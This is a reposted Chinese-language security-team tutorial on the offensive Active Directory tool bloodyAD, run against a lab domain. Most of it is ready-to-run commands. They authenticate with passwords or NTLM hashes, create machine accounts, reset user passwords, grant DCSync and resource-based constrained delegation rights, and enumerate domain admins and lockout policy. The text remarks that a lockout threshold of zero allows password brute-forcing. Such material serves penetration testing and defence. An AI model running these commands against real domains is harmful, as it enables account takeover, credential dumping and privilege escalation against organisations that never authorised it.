使用bloodyAD对域属性进行查询与修改
2022-10-12 22:52:39 Author: Gcow安全团队(查看原文) 阅读量:22 收藏

对域属性进行查询与修改

使用bloody AD

项目地址:

https://github.com/CravateRouge/bloodyAD

该工具有如下一些功能:

- delObject :删除对象

- addObjectToGroup 

- addForeignObjectToGroup 

- delObjectFromGroup 

- setShadowCredentials 

- setGenericAll 

- setOwner 

- setRbcd 

- setDCSync 

- setUserAccountControl

1
 认证

使用-u参数指定用户,-p参数指定明文密码或Hash。

1

#使用test用户,密码为[email protected]

-u test -p [email protected]

#使用win7机器账号和Hash认证

-u win7\$ -p aad3b435b51404ee

aad3b435b51404ee:53ebb01b78

a294aec70afe9a068be55d

2
新建机器用户
使用普通域用户即可创建机器用户machine$,密码为root。
1

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 addComputer machine 'root'

3
修改对象属性
执行如下命令修改指定对象的dNSHostName属性为DC01.xie.com。
1

python3 bloodyAD.py -d xie.com -u 

test -p [email protected] --host 10.211.55.4 setAttribute 'CN=machine3,CN=Computers,

DC=xie,DC=com' dNSHostName 

'["DC01.xie.com"]'

4
修改用户的密码
修改用户hack的密码为[email protected]
1

python3 bloodyAD.py -d xie.com -u administrator -p [email protected] --host 10.211.55.4 changePassword  hack '[email protected]'

5
添加/移除DCSync

1

#给域用户hack添加DCSync

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p [email protected] --host 10.211.55.4 setDCSync hack

#移除域用户hack的DCSync

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p [email protected] --host 10.211.55.4 setDCSync hack False

6
添加/移除RBCD

1

#添加机器账号machine对机器win10的RBCD

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p [email protected] --host 10.211.55.4 setRbcd machine win10$

#移除机器账号machine对机器win10的RBCD

python3 bloodyAD.py -d xie.com -u Administrator -d bloody -p [email protected] --host 10.211.55.4 setRbcd machine win10$ False

7
查询对象
查询域内所有用户
1

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getChildObjects 'CN=Users,DC=xie,DC=com' user

查询域内所有机器
2

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getChildObjects 'CN=Computers,DC=xie,DC=com' user

查询域管/企业管理员
3

#查询域管

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getObjectAttributes 'CN=Domain Admins,CN=Users,DC=xie,DC=com' member

#查询企业管理员

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getObjectAttributes 'CN=Enterprise Admins,CN=Users,DC=xie,DC=com' member

查询域的所有Container容器
4

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getChildObjects 'DC=xie,DC=com' container

查询指定对象属性
5

#查询指定对象所有属性

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com'

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getObjectAttributes CN=machine4

#查询指定对象指定servicePrincipalName属性

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getObjectAttributes 'CN=machine4,CN=Computers,DC=xie,DC=com' servicePrincipalName

查询域的MAQ属性
6

python3 bloodyAD.py -d xie.com -u test -p [email protected] --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' ms-DS-MachineAccountQuota

查询域的密码锁定策略

如下图,目标域的密码锁定策略是5,当错误大于5次时,用户被锁定。当该值为0时,说明没密码锁定策略,可以进行爆破。

7

python3 bloodyAD.py -d xie.com -u hack -p [email protected] --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' LockoutThreshold

查询域的密码锁定时间
8

python3 bloodyAD.py -d xie.com -u hack -p [email protected] --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' lockoutDuration

查询域的密码长度最小值
9

python3 bloodyAD.py -d xie.com -u hack -p [email protected] --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' minPwdLength

查询域功能级别
10

python3 bloodyAD.py -d xie.com -u hack -p [email protected] --host 10.211.55.4 getObjectAttributes 'DC=xie,DC=com' msDS-Behavior-Version

END

文章来源: http://mp.weixin.qq.com/s?__biz=MzUyNzk2NDcwMw==&mid=2247488036&idx=3&sn=bfc01760dfd22bf10cf7254be856dd51&chksm=fa76dd54cd01544290ef8178927afe1572fb444bdf0c361d19d00d99ca545378b9a02ab2f194#rd
如有侵权请联系:admin#unsafe.sh